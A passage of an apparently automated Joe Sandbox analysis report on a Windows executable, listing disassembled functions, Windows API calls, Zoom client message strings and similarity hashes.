                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: H_prolog3
                • String ID: download_file$download_file_handler$list_file$list_file_handler$share_file$share_file_handler$undefined_file$upload_file$upload_file_handler
                • API String ID: 431132790-1571056328
                • Opcode ID: e95151882264faa8588d909ef89b28f177ff4584f8d7348ff0d951d923a241d4
                • Instruction ID: 2ed205d862ef22636d6f96a65443b966e3ba23243d2177df2e3d404848a6fb7d
                • Opcode Fuzzy Hash: e95151882264faa8588d909ef89b28f177ff4584f8d7348ff0d951d923a241d4
                • Instruction Fuzzy Hash: F1018674A44354EFCF50AE29B8026BA76F5BB24B21F204417B446A6680CBF0450CEBEB
                Function 00C743C0 Relevance: 17.5, APIs: 2, Strings: 8, Instructions: 31windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C743C7
                • ??0?$CmmMessageTemplate_6@HV?$CStringT@D@Cmm@@V12@V12@HV12@@Archive@Cmm@@QAE@PBDH000000@Z.RWSNDPQSKZ(com.zoom.app.assistant.voice.command.ui.update.request,00009D33,type,title,detail,displayCommands,duration,pronounciation,00000004), ref: 00C743F9
                  • Part of subcall function 00C79F30: __EH_prolog3.LIBCMT ref: 00C79F37
                  • Part of subcall function 00C79F30: ??0?$CmmMessageTemplate_5@HV?$CStringT@D@Cmm@@V12@V12@H@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,00000004,00C743FE,com.zoom.app.assistant.voice.command.ui.update.request,00009D33,type,title,detail,displayCommands,duration), ref: 00C79F56
                  • Part of subcall function 00C938C3: __EH_prolog3_GS.LIBCMT ref: 00C938CA
                  • Part of subcall function 00C938C3: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C74449), ref: 00C938DE
                  • Part of subcall function 00C938C3: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.voice.command.ui.update.request,00000044,00C74449), ref: 00C93910
                  • Part of subcall function 00C938C3: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00000044,-00000004,com.zoom.app.assistant.voice.command.ui.update.request,00000044,00C74449), ref: 00C9394D
                  • Part of subcall function 00C938C3: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.voice.command.ui.update.request,00000044,-00000004,com.zoom.app.assistant.voice.command.ui.update.request,00000044,00C74449), ref: 00C9397F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@StringV12@$Archive$H_prolog3MessagePackageTree@$H000000@H00000@H_prolog3_Node@23@Root@Template_5@Template_6@TreeV12@@
                • String ID: com.zoom.app.assistant.voice.command.ui.update.request$detail$displayCommands$duration$indicateID$pronounciation$title$type
                • API String ID: 1869270054-1720361636
                • Opcode ID: 0646fd2f5e20d4a5b77ca541c760acc7d5ad52d8c252cefe2ee69e4f62b342b3
                • Instruction ID: c784202ba33de6849fae7c115ced5545b13332db7e23e504cf129b4ebccdad5b
                • Opcode Fuzzy Hash: 0646fd2f5e20d4a5b77ca541c760acc7d5ad52d8c252cefe2ee69e4f62b342b3
                • Instruction Fuzzy Hash: FCF096F1A84B40EFD720AFD5DC0AB9DB6E4AB00B15F404408F5545A6D1CBF4164CDB75
                Function 00C74720 Relevance: 17.5, APIs: 2, Strings: 8, Instructions: 31windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74727
                • ??0?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@HHHHH@Archive@Cmm@@QAE@PBDH000000@Z.RWSNDPQSKZ(com.Zoom.app.conf.meeting.paap.toggle.event,000027C0,collectionUrl,toggle,disableLegacyEventTracker,accountToggle,disablePerfEventTracker,disablePerfMetricSPReport,00000004), ref: 00C74759
                  • Part of subcall function 00C79CA0: __EH_prolog3.LIBCMT ref: 00C79CA7
                  • Part of subcall function 00C79CA0: ??0?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@HHHH@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,00000004,00C7475E,com.Zoom.app.conf.meeting.paap.toggle.event,000027C0,collectionUrl,toggle,disableLegacyEventTracker,accountToggle,disablePerfEventTracker), ref: 00C79CC6
                  • Part of subcall function 00C93B33: __EH_prolog3_GS.LIBCMT ref: 00C93B3A
                  • Part of subcall function 00C93B33: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C747A9), ref: 00C93B4E
                  • Part of subcall function 00C93B33: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.meeting.paap.toggle.event,00000044,00C747A9), ref: 00C93B80
                  • Part of subcall function 00C93B33: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00000044,-00000004,com.Zoom.app.conf.meeting.paap.toggle.event,00000044,00C747A9), ref: 00C93BBD
                  • Part of subcall function 00C93B33: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.meeting.paap.toggle.event,00000044,-00000004,com.Zoom.app.conf.meeting.paap.toggle.event,00000044,00C747A9), ref: 00C93BEF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$H000000@H00000@H_prolog3_Node@23@Root@Template_5@Template_6@Tree
                • String ID: accountToggle$collectionUrl$com.Zoom.app.conf.meeting.paap.toggle.event$disableLegacyEventTracker$disablePerfEventTracker$disablePerfMetricReport$disablePerfMetricSPReport$toggle
                • API String ID: 1018953180-3008889444
                • Opcode ID: 88c68873c910cac29a87b4e8014761c772658a4801a44ea59c74f2741dfe3791
                • Instruction ID: 07b657c741afae45967c30c23d65716c906b55331a549fa53bc68ebb345b6194
                • Opcode Fuzzy Hash: 88c68873c910cac29a87b4e8014761c772658a4801a44ea59c74f2741dfe3791
                • Instruction Fuzzy Hash: B1F0F6F4A88B40AFE730AB909C47B5FB2A0BB00B05F40452CF5552A2C1CBF40648DBB8
                Function 00C6ABC0 Relevance: 17.5, APIs: 2, Strings: 8, Instructions: 26windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6ABC7
                • ??0?$CmmMessageTemplate_7@_JV?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH0000000@Z.RWSNDPQSKZ(com.Zoom.app.conf.joinFailForForceUpdate,00002734,MeetingNo,Password,WebClientLink,MinClientVersion,JoinType,JMAK,VanityID,00000004), ref: 00C6ABFE
                  • Part of subcall function 00C7D1C0: __EH_prolog3.LIBCMT ref: 00C7D1C7
                  • Part of subcall function 00C7D1C0: ??0?$CmmMessageTemplate_6@_JV?$CStringT@_W@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH000000@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,00000004,00C6AC03,com.Zoom.app.conf.joinFailForForceUpdate,00002734,MeetingNo,Password,WebClientLink,MinClientVersion), ref: 00C7D1E9
                  • Part of subcall function 00C89C7B: __EH_prolog3_GS.LIBCMT ref: 00C89C82
                  • Part of subcall function 00C89C7B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6AC2A), ref: 00C89C96
                  • Part of subcall function 00C89C7B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.joinFailForForceUpdate,00000044,00C6AC2A), ref: 00C89CC8
                  • Part of subcall function 00C89C7B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00000044,-00000004,com.Zoom.app.conf.joinFailForForceUpdate,00000044,00C6AC2A), ref: 00C89D05
                  • Part of subcall function 00C89C7B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.joinFailForForceUpdate,00000044,-00000004,com.Zoom.app.conf.joinFailForForceUpdate,00000044,00C6AC2A), ref: 00C89D37
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$V12@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@@$H0000000@H000000@H_prolog3_Node@23@Root@Template_6@_Template_7@_Tree
                • String ID: JMAK$JoinType$MeetingNo$MinClientVersion$Password$VanityID$WebClientLink$com.Zoom.app.conf.joinFailForForceUpdate
                • API String ID: 1788101684-2579841256
                • Opcode ID: 75aa52dde3285b9e7e27d1b79e77be8cfe62778ffe5ea93e7ea2a85943ad6e59
                • Instruction ID: 9fbc2757f36066b584c92d951f1f854121f238d379d0feca7c5688b823cf92fa
                • Opcode Fuzzy Hash: 75aa52dde3285b9e7e27d1b79e77be8cfe62778ffe5ea93e7ea2a85943ad6e59
                • Instruction Fuzzy Hash: B0F0A071684B50BED3147754BC0BB2E6AA0AB40F59F400518B1153E2D9CBF10B4886B1
                Function 00CDA520 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 139memoryfileCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00CDA55C
                • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,?), ref: 00CDA5F3
                • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,00000034), ref: 00CDA614
                • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,00000034), ref: 00CDA632
                • GetProcessHeap.KERNEL32(00000000,?), ref: 00CDA684
                • HeapFree.KERNEL32(00000000), ref: 00CDA68B
                • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,00000034), ref: 00CDA6A2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: TrustVerify$Heap$CreateFileFreeProcess
                • String ID: 4
                • API String ID: 844456146-4088798008
                • Opcode ID: 18784b9fa982997751b8c6cbbf3a8a2a07f3097b70aed6c21f6eb1ed44c70240
                • Instruction ID: 27eeb1adca1c0c58182f32b434bb9eddc0e4bc1db3e870d55d07e77056802e3a
                • Opcode Fuzzy Hash: 18784b9fa982997751b8c6cbbf3a8a2a07f3097b70aed6c21f6eb1ed44c70240
                • Instruction Fuzzy Hash: 62515FB1D0034DEBDB10DF98C884BDEBBB5BB48314F148219E925BB380D77499858F61
                Function 00CDA6F0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 118memoryfileCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000,00DEF0D0,?,?), ref: 00CDA74A
                • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,?), ref: 00CDA7B5
                • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,00000034), ref: 00CDA7D6
                • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,00000034), ref: 00CDA7F4
                • GetProcessHeap.KERNEL32(00000000,?), ref: 00CDA80E
                • HeapFree.KERNEL32(00000000), ref: 00CDA815
                • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,00000034), ref: 00CDA82C
                • CloseHandle.KERNEL32(00000000), ref: 00CDA845
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: TrustVerify$Heap$CloseCreateFileFreeHandleProcess
                • String ID: 4
                • API String ID: 2170017040-4088798008
                • Opcode ID: 02e2855df0d60f0347b7e46209de3d90b2ca8cf16e786a9c9e90e3bb9fc59e16
                • Instruction ID: 3d5ba0dca874b5719e8354765d98d425a0adce097f0eb63ba55b1b2364842fb4
                • Opcode Fuzzy Hash: 02e2855df0d60f0347b7e46209de3d90b2ca8cf16e786a9c9e90e3bb9fc59e16
                • Instruction Fuzzy Hash: B3411CB1D00318AFDB10DF99DC88BDEBBB9AB04324F10422AE925B73D0DB7459498F61
                Function 00CAE0AD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 98processsynchronizationwindowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CAE0B7
                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000294,00CAE9BE,?,?), ref: 00CAE0E4
                • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00CAE1C1
                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CAE1D3
                • CloseHandle.KERNEL32(?), ref: 00CAE1DF
                • CloseHandle.KERNEL32(?), ref: 00CAE1EB
                • MessageBoxW.USER32(00000000,?,Fatal error,00040010), ref: 00CAE213
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CloseHandle$CreateFileH_prolog3_MessageModuleNameObjectProcessSingleWait
                • String ID: Fatal error$debug_message.exe
                • API String ID: 1227367235-2234747147
                • Opcode ID: 1a7079662009139cc40ca9dcaaa0511d722e179aa97dd15019a9a8710098c5f8
                • Instruction ID: 50c55094c3f640034debf3311799bae16e2804ce7b1776cc6d34ab1bc6135b28
                • Opcode Fuzzy Hash: 1a7079662009139cc40ca9dcaaa0511d722e179aa97dd15019a9a8710098c5f8
                • Instruction Fuzzy Hash: B0319C71800229AFDF20DB54DC8CBE9B7B8FF05305F0042E9E108A21A0DB749B89CFA5
                Function 00C6A6B0 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6A6B7
                • ??0?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@IV12@V12@H@Archive@Cmm@@QAE@PBDH000000@Z.RWSNDPQSKZ(com.zoom.app.notifyUserInputProxyAuth,00002730,TheProxyType,Server,Port,UserName,Password,Cancel,00000004), ref: 00C6A6E9
                  • Part of subcall function 00C7D580: __EH_prolog3.LIBCMT ref: 00C7D587
                  • Part of subcall function 00C7D580: ??0?$CmmMessageTemplate_5@IV?$CStringT@_W@Cmm@@IV12@V12@@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,00000004,00C6A6EE,com.zoom.app.notifyUserInputProxyAuth,00002730,TheProxyType,Server,Port,UserName,Password), ref: 00C7D5A6
                  • Part of subcall function 00C893F2: __EH_prolog3_GS.LIBCMT ref: 00C893F9
                  • Part of subcall function 00C893F2: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6A715), ref: 00C8940D
                  • Part of subcall function 00C893F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.notifyUserInputProxyAuth,00000044,00C6A715), ref: 00C8943F
                  • Part of subcall function 00C893F2: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,com.zoom.app.notifyUserInputProxyAuth,00000044), ref: 00C8947C
                  • Part of subcall function 00C893F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.notifyUserInputProxyAuth,?,-00000004,com.zoom.app.notifyUserInputProxyAuth,00000044), ref: 00C894AE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$ArchiveV12@$H_prolog3MessagePackageTree@$H000000@H00000@H_prolog3_Node@23@Root@Template_5@Template_6@TreeV12@@
                • String ID: Cancel$Password$Port$Server$TheProxyType$UserName$com.zoom.app.notifyUserInputProxyAuth
                • API String ID: 1744605436-225641350
                • Opcode ID: 6512b3b1fc3a0912fa86f4f10d5263b805af573168c7ac44e7a47b81eca2ffdc
                • Instruction ID: d06f56faf99b90df8f7b02a59d45f1c207948156ec683be8d6cb78642f339908
                • Opcode Fuzzy Hash: 6512b3b1fc3a0912fa86f4f10d5263b805af573168c7ac44e7a47b81eca2ffdc
                • Instruction Fuzzy Hash: 7AE06DB0680B51AED7207B98BC4BB1E6AB0BB00B58F440528B1096E2EACBF00548D776
                Function 00CFEAD1 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                Download Yara Rule
                APIs
                • _free.LIBCMT ref: 00CFEAE7
                  • Part of subcall function 00CFE54D: HeapFree.KERNEL32(00000000,00000000,?,00D082A9,?,00000000,?,?,?,00D0854C,?,00000007,?,?,00D089A1,?), ref: 00CFE563
                  • Part of subcall function 00CFE54D: GetLastError.KERNEL32(?,?,00D082A9,?,00000000,?,?,?,00D0854C,?,00000007,?,?,00D089A1,?,?), ref: 00CFE575
                • _free.LIBCMT ref: 00CFEAF3
                • _free.LIBCMT ref: 00CFEAFE
                • _free.LIBCMT ref: 00CFEB09
                • _free.LIBCMT ref: 00CFEB14
                • _free.LIBCMT ref: 00CFEB1F
                • _free.LIBCMT ref: 00CFEB2A
                • _free.LIBCMT ref: 00CFEB35
                • _free.LIBCMT ref: 00CFEB40
                • _free.LIBCMT ref: 00CFEB4E
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 8c2221f7e735ef5944f12220ad2953b2478db332b9b94ca9cdac58d3a3b65df0
                • Instruction ID: 592aefe9ca89acecc2094ac2df8551d33ed91ca4a7fbc0a01bafc0ef4ef2dd8c
                • Opcode Fuzzy Hash: 8c2221f7e735ef5944f12220ad2953b2478db332b9b94ca9cdac58d3a3b65df0
                • Instruction Fuzzy Hash: E421B67690010CEFCF81EF94C891DEE7BB9BF18344B4445A6B6159B131EB31EA44EB81
                Function 00CDEECB Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 234COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CDEED2
                  • Part of subcall function 00CDCAC4: EnterCriticalSection.KERNEL32(00DFFB90,00000000,?), ref: 00CDCADF
                  • Part of subcall function 00CDCAC4: GetCurrentThreadId.KERNEL32 ref: 00CDCAE5
                  • Part of subcall function 00CDCAC4: LeaveCriticalSection.KERNEL32(00DFFB90,?,00000000,?,?), ref: 00CDCB3D
                  • Part of subcall function 00CDBFE5: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(144E8D40,F7F48D8D,00CDCB1F,00CDD788,00DFFB90,000762E8,00CDCB1F,00DFFB90,?,?,?,00CDCB1F,00DFFB90,?), ref: 00CDBFFE
                  • Part of subcall function 00CDCC2E: __EH_prolog3.LIBCMT ref: 00CDCC35
                  • Part of subcall function 00CE245F: __EH_prolog3.LIBCMT ref: 00CE2466
                • GetFileAttributesW.KERNEL32(00E00008,?,meetinginfo.log,?,0000002C,00CDFDD4,?,00000354,00CE042C,?), ref: 00CDF019
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: H_prolog3$CriticalSection$AttributesCmm@@CurrentEnterFileLeaveState@ThreadUnlock@
